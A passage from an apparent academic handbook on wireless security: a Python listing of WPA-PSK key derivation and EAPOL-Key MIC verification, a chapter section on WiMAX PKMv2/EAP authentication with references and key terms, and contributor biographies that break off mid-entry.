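    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, bits):
    """IEEE 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    for i in range((bits + 159) // 160):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:bits // 8]


def derive_ptk(pmk, aa, spa, anonce, snonce, tkip=False):
    """Pairwise Transient Key from the 4-way handshake inputs.

    Authenticator (AA) and supplicant (SPA) MAC addresses and the two nonces are ordered by
    value, so both sides derive the same PTK whichever role they hold.
    CCMP needs 384 bits (KCK 128 | KEK 128 | TK 128); TKIP needs 512 (plus two Michael MIC keys).
    """
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 512 if tkip else 384)
    return {"kck": ptk[0:16], "kek": ptk[16:32], "tk": ptk[32:48], "ptk": ptk}


# EAPOL-Key frame layout (802.11i): the 16-byte MIC field starts after
# EAPOL header (4) + Descriptor Type (1) + Key Info (2) + Key Length (2) + Replay Counter (8)
# + Key Nonce (32) + Key IV (16) + Key RSC (8) + Key ID (8) = 81.
MIC_OFFSET = 81


def eapol_key_mic(kck, eapol_frame, tkip=False):
    """MIC over the whole EAPOL-Key frame with the MIC field zeroed.

    Key Descriptor Version 1 (TKIP): HMAC-MD5; version 2 (CCMP): HMAC-SHA1 truncated to 128 bits.
    """
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    if tkip:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def verify_eapol_key_mic(kck, eapol_frame, tkip=False):
    """Authenticator's check on message 2: constant-time compare against the received MIC field."""
    expected = eapol_key_mic(kck, eapol_frame, tkip)
    return hmac.compare_digest(expected, eapol_frame[MIC_OFFSET:MIC_OFFSET + 16])


def build_message2(snonce, key_data=b""):
    """Constructed EAPOL-Key message 2 (supplicant -> authenticator) with the MIC field zeroed."""
    key_info = (0x010A).to_bytes(2, "big")   # Pairwise | MIC | descriptor version 2 (AES / HMAC-SHA1)
    body = bytes([2]) + key_info + (16).to_bytes(2, "big") + (1).to_bytes(8, "big")   # RSN descriptor
    body += snonce + bytes(16) + bytes(8) + bytes(8)                                    # IV, RSC, Key ID
    body += bytes(16) + len(key_data).to_bytes(2, "big") + key_data                     # MIC, length, data
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body                          # EAPOL v2, type 3


def demo():
    """Constructed handshake: test-vector PSK, sample MACs and fixed nonces so the result is reproducible."""
    pmk = psk_to_pmk("password", "IEEE")
    aa, spa = bytes.fromhex("a0b1c2d3e4f5"), bytes.fromhex("0a1b2c3d4e5f")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    keys = derive_ptk(pmk, aa, spa, anonce, snonce)
    msg2 = build_message2(snonce)
    signed = msg2[:MIC_OFFSET] + eapol_key_mic(keys["kck"], msg2) + msg2[MIC_OFFSET + 16:]
    # Flip one bit in the Key Data Length field; the MIC must no longer verify.
    tampered = signed[:MIC_OFFSET + 16] + bytes([signed[MIC_OFFSET + 16] ^ 0x01]) + signed[MIC_OFFSET + 17:]
    return pmk, keys, verify_eapol_key_mic(keys["kck"], signed), verify_eapol_key_mic(keys["kck"], tampered)
```

Both the supplicant and the authenticator order the addresses and nonces by value before running the PRF, so they derive the same PTK from the same PMK, and the MIC on message 2 is what lets the authenticator confirm that the supplicant really holds the PMK without either side ever sending it. The TK that falls out is the CCMP or TKIP key for the rest of the session, which is why these keys differ per association instead of being a static WEP key.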



PKMv2-EAP Scheme in WiMAX (IEEE 802.16)

WiMAX (IEEE 802.16) stands for worldwide interoperability for microwave access, which is maintained by the WiMAX Forum. WiMAX has similarities with Wi-Fi; however, it claims to achieve higher bandwidth (up to 70 Mbps) over a 70-mile (110+ km) range, which outperforms Wi-Fi. There are also some similarities between the security schemes of WiMAX and IEEE 802.11i. In this section, the security mechanisms for WiMAX are described. For an end-to-end authentication scheme, WiMAX uses the extensible authentication protocol with privacy key management (EAP-PKM), which relies on the transport layer security (TLS) standard and public key cryptography ("WiMAX Technology," 2005). PKM is a protocol which uses the Rivest, Shamir, and Adleman (RSA) public-key scheme, X.509 digital certificates, and a strong encryption scheme for the subscriber station (SS)-base station (BS) interactions. There are two PKM protocols supported in the IEEE 802.16 standard: PKM version 1 (PKMv1) and PKM version 2 (PKMv2). PKMv1, which is a one-way authentication method, has been shown to be prone to a variety of attacks and is not covered in this chapter. PKM supports two authentication protocol mechanisms:

1. RSA public key-based certificates, mandatory in all devices
2. EAP

Authorization via PKM RSA Authentication Protocol

Figure 7 shows the authorization and authentication processes of the PKMv2 protocol using a request/grant access method. For an SS (PKM client) to have access to the BS network, the PKM server has to authorize the connection and the SS also needs to authenticate the BS; after that, the SS will have security features enabled. Once the SS associates with the BS, the SS shares a secret encryption key with the BS, and communication between

Figure 7. PKMv2 authentication and authorization process (Adapted from Adibi, Bin, Ho, Agnew, & Erfani, 2006)



the BS and SS can be initiated using encrypted messages.

Authorization via PKM Extensible Authentication Protocol

After the SS is associated to the BS, the EAP authorization procedure starts. Figure 8 shows the EAP authorization and authentication flow steps.

Security Analysis of WiMAX Authentication

EAP-PKM is intended to secure WiMAX clients and servers in a more robust way. The following list summarizes the strengths of EAP-PKM:

1. PKMv2 supports mutual authentication, which can prevent man-in-the-middle attacks.
2. The X.509 digital certificate issued for each SS is unique and cannot be easily forged.
3. Each service has a unique security association identifier (SAID); therefore, if one service is compromised, the other services are not affected.
4. The limited lifetime of the authorization key (AK) provides key refresh and periodic reauthorization, which prevents attackers from gathering enough data to launch cryptanalysis.
5. To counter replay attacks, it is recommended to add a random value (nonce) transmitted between the BS and SS for SA authorization.
6. WiMAX security supports two strong encryption algorithms, the triple data encryption standard (3DES) and AES, which are considered leading edge (AES in particular).
7. An SS is able to cache or transfer the master key to avoid a full reauthentication procedure.
8. EAP-PKM relies on the TLS standard, which is based on public key cryptography and is costly for some wireless vendors. Therefore, a high-performance security processor is dedicated to the BS in WiMAX, which enables the implementation of a complex authentication system.

In this section, WiMAX-based authentication using EAP-TLS and EAP-PKM was presented. This included the PKMv2 handshaking schemes. It is believed that WiMAX possesses more extensive security capabilities than Wi-Fi, which in turn will favor WiMAX in the comparative market share.

Figure 8. 802.16e EAP authentication process (Adapted from Adibi et al., 2006)



Conclusion

In this chapter, to help address the security issue of unauthorized access, the development of IEEE 802.1x to provide a standard authentication mechanism in port-based scenarios was presented. EAP, on the other hand, offers support for a variety of standard authentication messaging protocols. EAP provides a multivendor network authentication framework. Additional EAP types, including EAP-SIM and EAP-SecurID (which supports hardware tokens), are also defined. EAP specifies the method in which the supplicant, authenticator, and authentication server interact and the type of standard messages exchanged between them. EAP, however, does not specify the actual authentication protocol. Therefore, EAP's advantages can be summarized as:

• EAP permits multiple authentication protocols without extra setup steps.
• EAP is flexible and supports multiple authentication protocols without the necessity of matching an authenticator to a specific authentication mechanism. EAP permits the authentication server to select the most suitable authentication protocol supported on both the client and itself. This is usually done without the need to fully configure the authenticator with the authentication protocol. In this scenario, the authenticator acts as a pass-through device (pass-through is optional).
• The authenticator has the ability to act as a pass-through device for non-local clients and, at the same time, authenticate local clients using authentication protocols it may not support locally.
• The existence of a separate authenticator and authentication server operating in pass-through mode permits simplification of the credentials and the development of standard messaging protocols. The authenticator determines the outcome of the authentication from the access-accept or access-reject message provided by the authentication server; the outcome is not affected by the contents of the EAP packets it relays. The AAA messages carrying that decision must therefore be protected themselves, or an attacker able to manipulate them can alter the outcome.

Throughout this chapter, where appropriate, the application of EAP using different authentication/authorization methods for wireless applications was discussed. Special attention was given to EAP-TLS and EAP-PKMv2 for 802.16e systems.

References

Aboba, B., Blunk, L., Vollbrecht, J., Carlson, J., & Levkowetz, H. (2004, June). Extensible authentication protocol (EAP) (RFC 3748).

Adibi, S., Bin, L., Ho, P. H., Agnew, G. B., & Erfani, S. (2006, May). Authentication authorization and accounting (AAA) schemes in WiMAX. Paper presented at the Conference on Electro/Information Technology (EIT'06).

Calhoun, P., Loughney, J., Guttman, E., Zorn, G., & Arkko, J. (2003, September). Diameter base protocol (RFC 3588).

Chen, J. C., & Wang, Y. P. (2005, December). Extensible authentication protocol (EAP) and IEEE 802.1x: Tutorial and empirical experience. IEEE Communications Magazine, 43(12), supl.26-supl.32.

Hill, J. (2001). An analysis of the RADIUS authentication protocol. InfoGard Laboratories.

IEEE 802.11i: WLAN Security Standards. (2006). Javvin Technologies, Inc. Retrieved October 25, 2007, from http://www.javvin.com/protocol80211i.html

Kwan, P. (2003, May). 802.1x authentication & extensible authentication protocol (EAP) (White Paper).

Lehembre, G. (2005, December). Wi-Fi security – WEP, WPA and WPA2. Retrieved October 25, 2007, from http://www.hsc.fr/ressources/articles/hakin9_wifi/hakin9_wifi_EN.pdf

Leira, J. (2005, April 15). WLAN - IEEE 802.1x. The Norwegian Research Network (UNINETT).



Phifer, L. (2003, September). Deploying 802.1X for WLANs: EAP types. Retrieved October 25, 2007, from http://www.wi-fiplanet.com/tutorials/article.php/3075481

Phifer, L. (2003, September). Applying RADIUS to wireless LANs, using RADIUS for WLAN authentication, Part I. Retrieved from http://www.wi-fiplanet.com/tutorials/article.php/10724_3114511_1

Piscitello, D. M. (2005, April 16). IEEE 802.1x and EAP primer. Core Competence, Inc.

Stanley, D., Walker, J., & Aboba, B. (2005, March). Extensible authentication protocol (EAP) method requirements for wireless LANs (RFC 4017).

What are Your EAP Authentication Options? (2005, May). InteropNet Labs full spectrum security initiative. Retrieved October 25, 2007, from http://www.opus1.com/nac/whitepapers-old/04-EAP_OPTIONS-LV05.PDF

WiMAX Technology. (2005). Retrieved October 25, 2007, from http://ww.hifn.com/docs/WiMAX_AB_1.4.pdf

Wu, W. T., Chen, J. C., Chen, K. H., & Fan, K. P. (2005). Design and implementation of WIRE diameter. Paper presented at the 3rd International Conference on Information Technology: Research and Education, ITRE 2005.

Key Terms

AP: An access point (or wireless access point) is a device that connects wireless devices (i.e., mobile users [MUs], laptops, etc.) together. APs are usually connected to another device called a wireless controller (WC). A wireless network is usually comprised of a WC and a few APs servicing MUs.

DHCP: The dynamic host configuration protocol is a protocol that automatically manages (temporarily assigns and releases) IP addresses for devices on the network (wireless and wired).

DIAMETER: DIAMETER is an authentication, authorization, and accounting (AAA) protocol designed as the successor to RADIUS.

EAP: The extensible authentication protocol is a widely adopted framework for authentication. Its integration with other security schemes usually produces strong frameworks for various wireless and wired applications.

MD5: Message-digest algorithm 5 is a 128-bit hash function which is a widely used cryptographic element. MD5 has shown weaknesses; therefore it is not counted as a robust scheme nowadays.

PEAP: Protected EAP is a security method which transmits authentication information, including passwords, inside a TLS tunnel. PEAP can be used in a variety of scenarios, including wireless and wired topologies.

PKM: Privacy key management is the key management protocol of IEEE 802.16, based on RSA public-key certificates (and, in PKMv2, EAP), used for providing end-to-end security for wireless technologies.

RADIUS: Remote authentication dial-in user service is an AAA protocol that works in a client/server scenario. RADIUS oversees the authentication and authorization of the session established between two entities. DIAMETER is its successor.

TLS: Transport layer security is used mostly in client/server applications which require endpoint authentication and communications privacy, particularly over the Internet. This is done using cryptographic measures.

WiMAX: WiMAX stands for worldwide interoperability for microwave access, which has been defined by the WiMAX Forum, formed in 2001. WiMAX is also known as the IEEE 802.16 standard, officially titled WirelessMAN, and is an alternative to DSL (802.16d) and cellular access (802.16e).




About the Contributors

Yan Zhang received the PhD degree in School of Electrical & Electronics Engineering, Nanyang
Technological University, Singapore. From August 2004 to May 2006, he worked with the National
Institute of Information and Communications Technology (NICT), Singapore. Since August 2006, he
has worked with Simula Research Laboratory, Norway (http://www.simula.no/). He is on the editorial
board of the International Journal of Network Security. He is currently serving as the Book Series Edi-
tor for the book series, Wireless Networks and Mobile Communications (Auerbach Publications, CRC
Press, Taylor, and Francis Group). He is serving as co-editor for several books: Resource, Mobility and
Security Management in Wireless Networks and Mobile Communications; Wireless Mesh Networking:
Architectures, Protocols and Standards; Millimeter-Wave Technology in Wireless PAN, LAN and MAN;
Distributed Antenna Systems: Open Architecture for Future Wireless Communications; Security in
Wireless Mesh Networks; Mobile WiMAX: Toward Broadband Wireless Metropolitan Area Networks;
Wireless Quality-of-Service: Techniques, Standards and Applications; Broadband Mobile Multimedia:
Techniques and Applications; Internet of Things: From RFID to the Next-Generation Pervasive Net-
worked Systems; Unlicensed Mobile Access Technology: Protocols, Architectures, Security, Standards
and Applications; Cooperative Wireless Communications; WiMAX Network Planning and Optimiza-
tion; RFID Security: Techniques, Protocols and System-On-Chip Design; Autonomic Computing and
Networking; Security in RFID and Sensor Networks; and Handbook of Research on Wireless Security.
He serves as industrial co-chair for MobiHoc 2008, program co-chair for UIC-08, general co-chair
for CoNET 2007, general co-chair for WAMSNet 2007, workshop co-chair FGCN 2007, program vice
co-chair for IEEE ISM 2007, publicity co-chair for UIC-07, publication chair for IEEE ISWCS 2007,
program co-chair for IEEE PCAC’07, special track co-chair for “Mobility and Resource Management in
Wireless/Mobile Networks” in ITNG 2007, special session co-organizer for “Wireless Mesh Networks”
in PDCS 2006, and he is a member of Technical Program Committee for numerous international confer-
ence, including CCNC, AINA, GLOBECOM, ISWCS, ICC, and so forth. He received the Best Paper
Award and Outstanding Service Award as Symposium Chair in the IEEE 21st International Conference
on Advanced Information Networking and Applications (AINA-07). His research interests include
resource, mobility, energy, and security management in wireless networks and mobile computing. He
is a member of IEEE and IEEE ComSoc.

Jun Zheng received the BS and MS degrees in electrical engineering from Chongqing University,
China, in 1993, 1996, respectively, the MSE degree in biomedical engineering from Wright State Univer-
sity, Dayton, Ohio, in 2001, and the PhD degree in computer engineering from University of Nevada, Las
Vegas in 2005. Currently he is an assistant professor in the Department of Computer Science at Queens College of The City University of New York. He is also a member of the faculty of the doctoral program in computer science at the Graduate School and University Center of The City University of New York. He is the co-editor for two books: Security in Wireless Mesh Networks and Handbook of Research on Wireless Security. He served as general co-chair for WAMSNet-07, track co-chair for ITNG 2007, and session co-organizer for PDCS 2006. He also served as TPC member for several international conferences. His research interests are mobility and resource management in wireless and mobile networks, media access control, performance evaluation, network security, computer architectures, fault-tolerant computing, and image processing. He is a member of IEEE.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.

Miao Ma received the BEng. and MEng. degrees in electrical engineering from Harbin Institute
of Technology, China, respectively, and the PhD degree in electrical and electronic engineering from
Nanyang Technological University (NTU), Singapore. From August 2002 to December 2006, she worked
at the Institute for Infocomm Research (I2R), Singapore. Since January 2007, she has been working
at the Hong Kong University of Science and Technology (HKUST). She is a member of IEEE. Her
research interests include media access control, cognitive radio, security, wireless communications,
and networking.

* * * * *

Sasan Adibi received his BSc degree from Amirkabir University, Tehran, Iran, in 1996, his first MSc degree from Brunel University, London, in 1999, and his second MSc degree from the University of Windsor, Canada, in 2005. He is currently studying towards his PhD degree at the University of Waterloo and working as a contractor for Siemens Canada as a Verification Systems Engineer. His areas of interest include security (ad hoc networks, 3G, WiMAX, and Wi-Fi), quality of service (QoS) for MPLS- and wireless-based systems, and optimizations in ad hoc networks. His work experience includes extensive verification in routing (MPLS, OSPF, BGP), quality of service features (DiffServ, 802.11e, WMM, etc.), security and authentication (WPA v2, OKC, 802.1X, 802.11i, and RADIUS), Wi-Fi (802.11a/b/g), and VLAN (802.1D, 802.1Q, and 802.1p).

Gordon B. Agnew received his BASc and PhD in electrical engineering from the University of Wa-
terloo in 1978 and 1982, respectively. He joined the Department of Electrical and Computer Engineering
at the University of Waterloo in 1982. In 1984, he was a visiting professor at the Swiss Federal Institute
of Technology in Zurich where he started his work on cryptography. Dr. Agnew’s areas of expertise
include cryptography, data security, protocols and protocol analysis, electronic commerce systems,
high-speed networks, wireless systems, and computer architecture. He has taught many university
courses and industry sponsored short courses in these areas as well as having authored many articles.
In 1985, he joined the Data Encryption Group at the University of Waterloo. The work of this group led
to significant advances in the area of public key cryptographic systems including the practical
implementation of elliptic curve-based cryptosystems. Dr. Agnew is a member of the Institute
for Electrical and Electronics Engineers, a foundation fellow of the Institute for Combinatorics and its
Applications, and a registered professional engineer in the Province of Ontario. Dr. Agnew has provided
consulting services to the banking, communications, and government sectors. He is also a co-founder
of CERTICOM Corp., a world leader in public key cryptosystem technologies.


About the Contributors

Sheikh Iqbal Ahamed is an assistant professor in the Department of Mathematics, Statistics, and
Computer Science at Marquette University and director of the Ubicomp Research Lab. His research
focuses on pervasive security, trust, and privacy for pervasive computing. He received the PhD in com-
puter science from Arizona State University and the BS from the Bangladesh University of Engineering
and Technology.

Christer Andersson is a doctoral student at Karlstad University, Sweden, and his main research topic
is designing and evaluating technologies for anonymous communication in mobile networks. He has
proposed anonymity technologies for both infrastructured and infrastructureless mobile networks. He is
furthermore interested in measuring the degree of anonymity and performance in mobile networks, as
well as finding an appropriate trade-off between anonymity and performance. He holds a Licentiate of
engineering degree from Karlstad University (2005), and a Master Degree in computer science (2002)
from Linköping University, Sweden.

AbdelBaset M.H. Awawdeh received the BEng degree in industrial automation engineering from
Palestine Polytechnic University in 1999 and the MSE and PhD degrees in electronics engineering from
Alcala University in 2004. From 1999 to 2000 he was with the Department of Electrical and Computer
Engineering at Palestine Polytechnic University, Palestine. Since 2004, he has held a researcher position
in the Department of Electronics at University of Alcala, Spain. His technical interests include multiagent
system interaction and design, vehicle on-board electronics, and vehicle fault diagnosis systems.

Mohamad Badra is employed by the CNRS (National Center for Scientific Research, France)
researching wireless networks security. Badra performs his research activities at the LIMOS Labora-
tory - UMR6158, University Blaise Pascal. He was a postdoctoral fellow at the Computer Science and
Networks Department, ENST-Paris. His research interests include key exchange, wireless security,
public-key infrastructures, smart cards, and security algorithms. Badra received a PhD in networks and
computer sciences from ENST-Paris. He is a member of the IEEE and of ESRGroups.

Sungmin Baek received his BS degree from the School of Information and Communication Engineering,
Sung Kyun Kwan University in 2004 and an MS degree from the Department of Computer Engineering
and School of Computer Science and Engineering, Seoul National University in 2006. Currently, he is
a research engineer in information and technology laboratory, LG Electronics Institute of Technology.
His research interests include multimedia transmission over wireless network and wireless personal
area networks.

Javier A. Barria received the BSc degree in electronic engineering from the University of Chile,
Santiago, in 1980, and the PhD and MBA degrees from Imperial College London in 1992 and 1998,
respectively. From 1981 to 1993, he was a system engineer and project manager (network operations)
with the Chilean Telecommunications Company. Currently, he is a reader in the Intelligent Systems
and Networks Group, Department of Electrical and Electronic Engineering, Imperial College London.
His research interests include communication networks monitoring strategies using signal and image
processing techniques, distributed resource allocation in dynamic topology networks, and fair and
efficient resource allocation in IP environments. He has been a joint holder of several
European Union project contracts all concerned with aspects of communication systems design and
management. Dr. Barria was a British Telecom Research Fellow (2001 – 2002) and a Tan Chin Tuan
Research Fellow, NTU Singapore (2003 - 2004). He is a fellow member of IEE, member of IEEE, and
a chartered engineer.

Paolo Bellavista graduated from University of Bologna, Italy, where he received the PhD degree in
computer science engineering in 2001. He is now an associate professor of computer engineering at
the University of Bologna. His research activities span from mobile agent-based middleware solutions
and pervasive wireless computing to location/context-aware services and adaptive multimedia. He is
a member of IEEE and the Italian Association for Computing (AICA). He is an associate technical editor of
the IEEE Communication Magazine.

Soong Boon-Hee received his BEng (honors I) degree in electrical and electronic engineering from
University of Auckland, New Zealand and a PhD degree from the University of Newcastle, Australia
in 1984 and 1990, respectively. He is currently an associate professor with the School of Electrical and
Electronic Engineering, Nanyang Technological University. From October 1999 to April 2000, he was
a visiting research fellow at the Department of Electrical and Electronic Engineering, Imperial College,
UK under the Commonwealth Fellowship Award. He was awarded the Tan Chin Tuan Fellowship to
visit the Centre for Advanced Computing and Communications, Duke University in June 2004. He also
served as a consultant for mobile IP in a recent next-generation technical field trial
initiated by IDA (InfoComm Development Authority, Singapore). His research interests include
mobile ad hoc and sensor networks, mobility issues, mobile IP, optimization of wireless networks, rout-
ing algorithms, optimization and planning of mobile communication networks, queuing theory, system
theory, quality of service issues in high-speed networks, and signal processing. He has served as a
reviewer for a number of IEEE top journals and international conferences. He has served on Technical
Program Committee for IEEE Globecom 2004, 2005, 2006, and 2007, IEEE WCNC 2005, and IEEE
ISWCS 2004, 2005, 2006, and 2007. He is currently organizing co-chair of IEEE Vehicular Technol-
ogy Conference, Spring 2008 to be held in Singapore. He is currently on the technical committee ISO
204/WG16 that tracks developments in the intelligent transport sector. He is listed in Marquis Who’s
Who in Science and Engineering 2006-2007. He has published more than one hundred papers in international
journals and conferences. He is a senior member of IEEE and a member of ACM.

Noureddine Boudriga is a professor of telecommunication and director of the Communication
Networks and Security (CN&S) Research Laboratory at the University of November 7th at Carthage,
Tunisia. His research interests have covered several topics including communication networks, network
engineering, optical networks, wireless networks, Internet work, and network security. He received his
PhD in mathematics from the University of Paris XI and his PhD in computer science from the Univer-
sity of Tunis. Professor Boudriga is the recipient of the Presidential Award for Science and Research in
Communication Technologies (Tunisia, 2004).

John Buford is a research scientist with Avaya Labs. Previously he was a lead scientist at the Panasonic
Princeton Laboratory, VP of Software Development at Kada Systems, director of Internet Technologies
at Verizon, and chief architect-OSS at GTE Laboratories. Earlier he was tenured associate professor
of computer science at the University of Massachusetts Lowell, where he also directed the Distributed
Multimedia Systems Laboratory. He has authored or co-authored ninety refereed publications and the
book Multimedia Systems. He is an IEEE senior member and is co-chair of the IRTF Scalable Adaptive
Multicast Research Group. He holds the PhD from Graz University of Technology, Austria, and MS
and BS degrees from MIT.

Mihaela Cardei is an assistant professor in the Department of Computer Science and Engineering at
Florida Atlantic University, and director of the NSF-funded Wireless and Sensor Network Laboratory.
Dr. Cardei received her PhD and MS in computer science from the University of Minnesota, Twin Cit-
ies, in 2003 and 1999, respectively. Her research interests include wireless networking, wireless sensor
networks, network protocol and algorithm design, and resource management in computer networks.
Dr. Cardei is a recipient of the 2007 Researcher of the Year Award at Florida Atlantic University. She
is a member of IEEE and ACM.

Luca Caviglione (M.D. 2002, Ph.D. 2006) participated in several research projects funded by the
EU, by ESA, and by Siemens COM AG. He is author and co-author of many academic publications
about TCP/IP networking, P2P systems, QoS architectures, and wireless networks. He is a member
of the Italian IPv6 Task Force and he participates in several TPCs and performance talks about IPv6
and P2P. He is with the Institute of Intelligent Systems for Automation (ISSIA) – Genoa Branch of the
National Research Council of Italy.

Symeon Chatzinotas has a BSc in electrical and computer engineering from Aristotle University of
Thessaloniki and a MSc in microwave engineering and wireless subsystem design from University of
Surrey. Since 2006 he has been working on his PhD at the Centre for Communication Systems Research,
University of Surrey. His current research interests include mobile networking, wireless security, and
network information theory.

Hsiao-Hwa Chen is currently a full professor in Institute of Communications Engineering, National
Sun Yat-Sen University, Taiwan. He received BSc and MSc degrees with the highest honor from
Zhejiang University, China, and a PhD degree from the University of Oulu, Finland, in 1982, 1985 and
1990, respectively, all in electrical engineering. He worked with Academy of Finland as a Research
Associate from 1991 to 1993 and the National University of Singapore as a lecturer and then a senior
lecturer from 1992 to 1997. He joined Department of Electrical Engineering, National Chung Hsing
University, Taiwan, as an associate professor in 1997 and was promoted to a full professor in 2000.
In 2001 he joined National Sun Yat-Sen University, Taiwan, as a founding director of the Institute of
Communications Engineering of the University. Under his strong leadership the institute was ranked
second in the country in terms of SCI journal publications and National Science Council funding per
faculty member in 2004. In particular, National Sun Yat-Sen University was ranked first in terms of
the number of SCI journal publications in wireless LANs research papers during 2004 to mid-2005,
according to a research report (www.onr.navy.mil/scitech/special/354/technowatch/textmine.asp)
released by the Office of Naval Research, USA. He was a visiting professor to the Department of
Electrical Engineering, University of Kaiserslautern, Germany, in 1999, the Institute of Applied Phys-
ics, Tsukuba University, Japan, in 2000, Institute of Experimental Mathematics, University of Essen,
Germany in 2002 (under DFG Fellowship), the Chinese University of Hong Kong in 2004, and the City
University of Hong Kong in 2007.

Thomas Chen is an associate professor at Southern Methodist University. Prior to joining SMU, he
worked on ATM research at GTE Laboratories (now Verizon). He has been the editor-in-chief of IEEE
Communications Magazine since 2006. He also serves as senior technical editor for IEEE Network, and
was the founding editor of IEEE Communications Surveys. He co-authored ATM Switching Systems
(Artech House 1995). He received the IEEE Communications Society’s Fred W. Ellersick Best Paper
Award in 1996.

Yifan Chen received the BEng and PhD degrees in electrical and electronic engineering from Nan-
yang Technological University (NTU), Singapore, in 2002 and 2006, respectively. He is presently with
the Biomedical Engineering Research Centre, NTU, as a research fellow. His current research interests
involve ultra-wideband (UWB) radar system for biomedical applications including microwave imaging
of human tissues and noncontact vital-signs monitoring, statistical modeling of mobile radio channels,
UWB signal processing for wireless communications and geolocation systems, multiple-antenna system
performance analysis, and wireless networks.

Zhijia Chen is currently a PhD student in Department of Computer Science and Technology, Tsin-
ghua University. He is a visiting graduate student at School of Engineering of Stanford in Spring 2007.
His research area is in P2P networking and media streaming. He has published four academic papers
in area of P2P streaming, protocol modeling, and so forth. He is the International First Prize winner in
American Mathematical Contest in Modeling (MCM 2004 Meritorious Winners). He is also the network
session chair in 1st Beijing-Hong Kong Doctoral Forum on Network and Media 2006.

Yanghee Choi received BS in electronics engineering from Seoul National University, MS in elec-
trical engineering from Korea Advanced Institute of Science, and Doctor of Engineering in computer
science from Ecole Nationale Superieure des Telecommunications (ENST) in Paris, in 1975, 1977, and
1984, respectively. He was with the Electronics and Telecommunications Research Institute (ETRI)
during 1977-1991. He is now leading the Multimedia and Mobile Communications Laboratory in Seoul
National University. He is also director of Computer Network Research Center in Institute of Computer
Technology (ICT). He is vice-president of Korea Information Science Society. His research interest lies
in the field of multimedia systems and high-speed networking.

Mohammad M. R. Chowdhury is working toward the PhD degree in the University Graduate Center
at Kjeller (UniK)/University of Oslo, Norway in the area of user mobility and service continuity. He
received his MSc from Helsinki University of Technology in radio communications. His current areas of
interest are identity and identity based service interactions, seamless user experience in heterogeneous
wireless networks, and development of innovative service concepts for mobile operators.

Tomasz Ciszkowski received MSc degree in electronics and computer engineering from Faculty of
Electronics and Information Technology of Warsaw University of Technology (WUT), Poland, in 2004.
Currently, he is working toward a PhD degree in telecommunications at WUT on reputation service in
anonymous ad hoc networks. Since 2004 he has been working for Polish Telecom in multimedia services
division. His research activities are reflected in European research projects on next-generation
Internet (EuroNGI) and end-to-end QoS support over heterogeneous networks (EuQoS).

Amitabha Das obtained his BTech (honors) degree in electronics and electrical communication
engineering from the Indian Institute of Technology, Kharagpur in 1985, and his PhD in computer
engineering from the University of California, Santa Barbara, in 1991. Currently he is an associate
professor in the School of Computer Engineering in Nanyang Technological University, Singapore. His
research interests include wireless and mobile networks, network security, and intrusion detection. He
is a senior member of IEEE.

Robert H. Deng received his Bachelor from National University of Defense Technology, China, and
his MSc and PhD from the Illinois Institute of Technology. He has been with the Singapore Management
University since 2004, and is currently a professor, associate dean for Faculty & Research, and director
of SIS Research Center, School of Information Systems. Prior to this, he was principal scientist and
manager of Infocomm Security Department, Institute for Infocomm Research, Singapore. He has 26
patents and more than 200 technical publications in international conferences and journals in the areas
of computer networks, network security, and information security. He served as general chair, program
committee chair, and member of numerous international conferences, including PC co-chair of the 2007
ACM Symposium on Information, Computer and Communications Security. He received the University
Outstanding Researcher Award from the National University of Singapore in 1999 and the Lee Kuan
Yew Fellow for Research Excellence from the Singapore Management University in 2006.

Mieso Denko is an associate professor of computing and information science at the University of
Guelph, Ontario, Canada. He received his BSc degree in statistics and mathematics from Addis Ababa
University. He received his MSc degree from the University of Wales, UK, and his PhD degree from
the University of Natal, South Africa, both in computer science. His current research interests include
wireless ad hoc networks, wireless mesh networks, wireless sensor networks, pervasive computing, and
networking. He has published numerous research papers in international journals, conferences, work-
shops, and contributed to book chapters. Currently he is co-editing three books in the above areas. Dr.
Denko has been actively involved in professional services as organizer or co-organizer of international
conferences, symposiums, and workshops, as well as TPC member for a number of conferences and
workshops. Among these, most recently he was the general co-chair of the IEEE PCAC-07, general
vice-chair of ISPA-07 and program vice-chair of IEEE AINA-07. Currently he is a program vice-chair
of the IEEE AINA-08, and co-organizer and program co-chair of the IEEE MHWMN-07 and IST-
AWSN-07. Dr. Denko is a senior member of the ACM, a member of the IEEE, ACM SIGMOBILE,
IEEE Communications Society, and IEEE Computer Society.

Yacine Djemaiel holds a Master Degree in telecommunications and he is currently preparing his
PhD thesis in telecommunications in the Engineering School of Communications (SUP’COM, Tuni-
sia). He is conducting research activities in the area of intrusion detection and tolerance and digital
investigation of security incidents. Since September 2006, Mr. Djemaiel has been a teaching assistant
in telecommunications.

Felipe Espinosa received the BSc and MSc degrees in telecommunications from Polytechnics University
of Madrid (Spain) in 1984 and 1991, respectively. He received the PhD degree in telecommunications
from University of Alcala (Spain) in 1998. He was a lecturer from 1985 to 2000 and has been an associate
professor since 2000, always in the Electronics Department at the University of Alcalá (Spain). His
main research interests include electronic control and communication applied to cooperative guidance
of robots and vehicles, as well as intelligent transportation systems.

Simone Fischer-Hübner has been a full professor at the Computer Science Department of Karlstad
University since June 2000, where she is the head of the PriSec (Privacy & Security) research group. She
received Doctoral (1992) and Habilitation (1999) degrees in computer science from Hamburg University.
Her research interests include technical and social aspects of IT-security, privacy, and privacy-enhancing
technologies. She was a research assistant/assistant professor at Hamburg University (1988-2000) and
a guest professor at the Copenhagen Business School (1994-1995) and at Stockholm University/Royal
Institute of Technologies (1998-1999).

J. Antonio Garcia-Macias holds a PhD from the Institut National Polytechnique de Grenoble
(INPG), France. He is currently a researcher at CICESE Research Center, working in the Computer Sci-
ence Department. His current research interests are wireless (ad hoc and sensors) networks, ubiquitous
computing, next-generation Internet services and protocols, and distributed collaborative systems.

Kaj J. Grahn, Dr. Tech. from Helsinki University of Technology, is presently a senior lecturer in
